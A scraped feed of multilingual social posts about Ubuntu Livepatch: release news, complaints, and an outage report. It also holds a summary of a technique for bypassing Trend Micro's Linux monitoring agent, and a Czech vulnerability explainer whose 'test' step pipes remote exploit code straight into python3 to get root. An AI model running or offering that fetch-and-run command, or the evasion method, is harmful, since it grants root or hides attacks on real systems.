รุนหวัดค้าบ คลิปสรุปLivepatch zzz มาวันนี้นะคะ กี่โมงไม่รู้ เพราะให้เมเนพ้มตัดต่อละ 5555 ขอให้เป็นวันที่ดีนะคะ 💜🍀✨️

Ubuntu Livepatch is a feature that applies kernel security fixes while the system is still running, so you do not need to reboot immediately after every kernel update. 👉 tecmint.com/enable-ubuntu-li… Follow @tecmint for more #Linux tips.

Ubuntu Livepatch: Parchea los núcleos sin reiniciar en Ubuntu 26.04 www-tecmint-com.translate.go…

You do know that Ubuntu 26.04LTS is released now?! It is better than Ubuntu 24.04LTS! Go to Ubuntu.com and get Ubuntu Pro since it will get you Livepatch etc

Starting with Ubuntu 26.04 LTS, @Canonical Livepatch now extends its rebootless kernel patching capability to Arm64 for the first time. For organizations running Ubuntu on Arm64 server and edge hardware, this means critical kernel updates can be applied without service interruption. Learn more about Ubuntu 26.04 LTS: ubuntu.com/blog/canonical-re… #Ubuntu #Livepatch #Security

>he doesnt know about livepatch

VCF 9.1.0.0100 (9.1 EP1) がリリースされました📝 各コンポーネントに各種セキュリティ脆弱性の修正が入ったバージョンです ESX 9.1 適用済みの場合、9.1 EP1 への更新は LivePatch で更新可能🙇 Release Note techdocs.broadcom.com/us/en/… Download support.broadcom.com/group/e… #VMware #VCF

🚨 Critical Threat Intelligence Alert 🚨 Research published yesterday by specialist @MatheuzSecurity reveals a local protection bypass technique targeting the Trend Micro Deep Security Agent on Linux. By generating a controlled “event storm” (high volume of filesystem and process events), it is possible to force the agent to unload the kernel modules bmhook and tmhook, creating a temporary window without behavioral monitoring. Full article PoC:
matheuzsecurity.github.io/ha… (1/3) #CyberSecurity #ThreatIntelligence #EDR Post 2/3 ⚠️ Technical Details •Affected modules: bmhook (Behavior Monitoring) and tmhook (Generic Syscall-Hooking via livepatch). •Trigger: High-volume benign event storm (writes, renames, symlinks, forks, and exits). •Mechanism: The ds_am.init process executes rmmod on the modules as part of the agent’s internal recovery mechanism under load. •Exposure window: Approximately 1.3 seconds without the modules loaded up to ~19.6 seconds for full transition. During this interval, actions normally blocked by the EDR can be executed successfully. (2/3) #LinuxSecurity #EndpointProtection #InfoSec Post 3/3 📌 Impact and Recommendations for Security Teams This represents a degradation of the EDR’s own recovery mechanism, exploitable in a repeatable manner by unprivileged local users (or by malware already present on the endpoint). It enables artifact staging and evasion of behavioral detections. Recommended actions: •Actively monitor module unload logs (dmesg, /proc/modules) •Assess exposure in Linux environments running Deep Security Agent •Implement additional telemetry and compensating controls •Monitor for official vendor response Excellent research work by @MatheuzSecurity. (3/3) #RedTeam #BlueTeam #VulnResearch #MalwareAnalysis #ThreatHunting

Starting with Ubuntu 26.04 LTS, @Canonical Livepatch now extends its rebootless kernel patching capability to Arm64 for the first time. For organizations running Ubuntu on Arm64 server and edge hardware, this means critical kernel updates can be applied without service interruption. Learn more about Ubuntu 26.04 LTS: ubuntu.com/blog/canonical-re… #Ubuntu #Livepatch #Security

Ubuntu Core 26 arrives for IoT and edge devices with smaller OTA updates, ARM64 Livepatch, and up to 15 years of security maintenance. linuxiac.com/canonical-launc… #Ubuntu #Linux #OpenSource

systemd systemd-resolved Snap Forced Firefox Snap AppArmor by default Netplan cloud-init Ubuntu Pro nagging and MotD advertising Amazon search lens history Telemetry Unattended upgrades GNOME (itself) GNOME heavily patched by Canonical NetworkManager journald binary logs PolicyKit / polkit D-Bus dependency sprawl PackageKit / Software Center layers PPA culture Apt mixed with Snap mixed with Flatpak Canonical NIH syndrome: Upstart, Unity, Mir, Snap, Launchpad, Bazaar, Netplan: Canonical keeps inventing its own stack, then sometimes abandoning parts of it. Launchpad centralization ESM / security update segmentation Livepatch as a Canonical service Advantage/Pro client packages Apport Whoopsie Tracker / indexing services — GNOME file indexers that can chew resources and feel invasive. Avahi zeroconf/mDNS daemon running for local network discovery, sometimes unnecessary attack surface. CUPS browsing / printer auto-discovery ModemManager often installed even when you do not use mobile broadband. Bluetooth stack always lurking BlueZ and GUI layers. A pile of background daemons for “convenience” the classic Ubuntu problem: usable, but increasingly less minimalist and less legible. Corporate desktop assumptions Debian base with Canonical control layer on top. The tragedy: underneath is Debian; above it is a Canonical product funnel. That's just off the top of my head to start.

**CVE-2026-31431 („Copy Fail“)** je vážná **lokální eskalace privilegií (LPE)** v jádře Linuxu. Umožňuje jakémukoli běžnému uživateli (ne-root) získat root přístup na systému. ### Co přesně zranitelnost umožňuje? - Chyba je v modulu **algif_aead** (část AF_ALG – uživatelského crypto API v jádře). - Pomocí systémových volání `AF_ALG` `splice()` dokáže útočník provést **kontrolovaný 4bajtový zápis** do *page cache* (paměťové cache) libovolného souboru, který může číst. - Typicky zacílí na setuid binárky jako `/usr/bin/su`, `/usr/bin/sudo` apod. → upraví je v paměti (ne na disku!), spustí je a získá root. - Exploit je extrémně spolehlivý (100 %, bez race condition), funguje na všech major distribucích od roku 2017 (Ubuntu, RHEL, Amazon Linux, SUSE, Debian, Fedora, Rocky, Alma atd.). - Funguje i v kontejnerech (Docker, Kubernetes) → může uniknout z containeru na host (page cache je sdílený). - PoC je veřejný (732 bajtů Pythonu) a funguje stejně na všech postižených systémech. **Není to remote zranitelnost** – vyžaduje lokální účet (shell, uživatelský kód v CI, container atd.). ### Jak zjistit, jestli je tvůj server/počítač zranitelný? 1. **Zkontroluj verzi jádra** ```bash uname -r ``` 2. **Aktualizuj systém a zkontroluj, jestli máš patch** - **Ubuntu/Debian**: ```bash sudo apt update && sudo apt upgrade uname -r # musí být novější než před updatem ``` Ubuntu vydalo mitigation přes balíček `kmod` (zakázání modulu) a později kernely. - **RHEL / Alma / Rocky / Fedora**: ```bash sudo dnf update ``` - **Amazon Linux**: Podívej se na ALAS (Amazon Linux Security). - **Obecně**: Porovnej svou verzi jádra s advisory tvé distribuce (hledat „CVE-2026-31431“ název distro). Patchovaný kernel obsahuje revert optimalizace z roku 2017 (commit `a664bf3`). 3. **Rychlý test zranitelnosti (jen na testovacích systémech!)** ```bash curl copy.fail/exp | python3 ``` Pokud ti to dá root shell (`id` ukáže uid=0), jsi zranitelný. **Varování**: Spouštěj jen na vlastních/testovacích strojích. Po testu reboot. ### Okamžitá ochrana (i když ještě nemáš patch) ```bash # Zakázání zranitelného modulu (funguje na většině systémů) echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif.conf sudo rmmod algif_aead 2>/dev/null || true ``` - Po tomto by exploit měl selhat. - Pro trvalost rebootuj a zkontroluj: ```bash lsmod | grep algif_aead # nemělo by nic ukazovat ``` Další možnosti: seccomp filtry blokující `AF_ALG` sockety (vhodné pro kontejnery/CI), nebo livepatch (KernelCare apod.). ### Doporučení - **Aktualizuj jádro reboot** → to je jediná plnohodnotná oprava. - Pokud máš multi-tenant prostředí (servery s více uživateli, Kubernetes, CI runners, cloud instance), priorita je **vysoká**. - Na osobním počítači (kde jsi jediný uživatel) je riziko nižší, ale stejně to oprav. Pokud mi napíšeš výstup z `uname -r` a jakou máš distribuci/verzi, můžu ti říct přesněji, jestli jsi už v pořádku.

Will a fix come via Ubuntu livepatch at some point?

Ubuntu 의 Kernel Livepatch 같은 리눅스 커널 무중단 패치가 몇몇 배포판에 있는데, 이건 기업 섭스에서 제공되는 기능이라 개인은 제한적으로만 적용되는 것 같다. LE 가 인증서를 무료로 풀어 https 의 보급을 이뤘듯, 커널 livepatch 기능이 대중화될까?

Just logged into my workstation, tried to install some software... and nothing. 😑 Turns out Canonical and Ubuntu are facing a "sustained" attack right now. ⚠️ Quick breakdown: Down: Snap, Login, Launchpad, Livepatch, and official sites. OK: The OS is safe and APT repos (mirrors) are still working. Don't tweak your config if things are failing—it’s on their end! 🛠️ #Ubuntu #Linux #Canonical